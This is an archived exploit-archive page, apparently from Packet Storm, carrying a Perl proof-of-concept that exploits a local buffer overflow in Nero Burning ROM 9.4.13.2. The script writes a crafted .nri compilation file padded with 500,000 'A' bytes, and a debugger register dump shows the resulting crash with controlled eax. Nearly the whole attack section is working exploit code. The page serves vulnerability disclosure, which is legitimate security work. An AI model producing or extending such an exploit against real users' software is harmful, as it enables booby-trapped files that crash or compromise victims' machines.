we care because you do

Nero Burning ROM 9 Buffer Overflow

Nero Burning ROM 9 Buffer Overflow
Posted Feb 23, 2010
Authored by LiquidWorm

Nero Burning ROM 9 iso compilation local buffer overflow exploit. Version 9.4.13.2 is affected.

tags | exploit, overflow, local
MD5 | 62d7a64387219c024ef689f804b43af4

Nero Burning ROM 9 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
#
# Title: Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept
#
#
# Product web page: http://www.nero.com
# Version tested: 9.4.13.2
# OS platform used: Microsoft Windows XP Professional SP3 (English)
#
# Registers pick'a'chu:
# ------------------------------------------------------------------------
#
# (adc.b30): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0012ecf0 edx=00000000 esi=04c8acc8 edi=00e29890
# eip=0057f53c esp=0012ec38 ebp=0012ed28 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# Nero+0x17f53c:
# 0057f53c 394204 cmp dword ptr [edx+4],eax ds:0023:00000004=????????
#
# ------------------------------------------------------------------------
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 30.09.2009
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4927.php
#



## ##
# # # #
# # # #
#O # # O#
#[*] # # [*]#
####
$id="\xFF\xFE".
"\xFF\x0E\x4E\x00".
"\x65\x00\x72\x00\x6F".
"\x00\x49\x00\x53\x00\x4F".
#####===###_O----O_###===#####
"\x00\x30\x00\x2E\x00\x30\x00".
"\x33\x00\x2E\x00\x30\x00\x31".
"\x00\x0B\x00\x00\x00\x01".
"\x00\x00\x00\x00\x00".
"\x10\x4E".
"\x45".
"\x52".
"\x4F".
"\x20\x42\x55\x52\x4E\x49".
"\x4E". "\x47\x20". "\x52".
"\x4F". "\x4D\x00\x00". "\x00".
"\x9C". "\x20\xBC\x4A\x9C". "\x20".
"\xBC". "\x4A\xFF\xFF". "\xFF".
"\xFF". "\xFF\xFF\xFF". "\xFF".
"\x00". "\x00\x00". "\x00".
"\x9F". "\x20". "\xBC". "\x4A".
"\x01". "\x00". "\x00"."\x00".
"\x00". "\x00". "\x00"."\x00".
"\x01"."\x00\x00". "\x00\x01"."\x00".
"\x00". "\x00".
"\x01". "\x00".
"\x00". "\x00".
"\x00". "\x00".
"\x00". "\x00";
###############################################
###############################################



$fl="Neeero.nri";$op="\x41" x 500000;
open nri, ">./$fl" || die "\nCan't open $fl: $!";
print nri $id.$op;
print "\n ~ Invasion started...\n";
sleep 1;close nri;
print "\n ~ File $fl invaded host.\n";

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    11 Files
  • 27
    May 27th
    8 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close